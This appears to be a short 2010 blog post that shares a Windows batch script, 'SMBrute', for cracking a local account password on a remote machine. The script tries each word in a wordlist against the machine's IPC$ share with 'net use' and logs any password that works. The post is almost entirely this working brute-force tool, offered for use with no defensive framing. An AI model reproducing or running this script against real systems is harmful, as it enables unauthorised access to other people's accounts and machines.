Selasa, 24 Agustus 2010

SMBBrute script

if the cain abel can use it for brute in network....

@echo off
echo SMBrute Script,
echo Usage: smbrute machinename local-account-to-crack
echo Output: log.txt(debugging log) and output.txt (Holds password and machine name)
echo Stuff: make sure that you have a text file with your word list called
echo "wordlist.txt" in the same working directory.
if "%1"=="" goto end
if "%2"=="" goto end
del log.txt
FOR /F "tokens=1" %%i in (wordlist.txt) do ^
echo %%i && ^
net use \\%1\ipc$ %%i /u:%1\%2 2>>log.txt && ^
echo %time% %date% >> outfile.txt && ^
echo \\%1\ipc$ acct: %2 pass: %%i >> outfile.txt && goto end
echo *****Done*****

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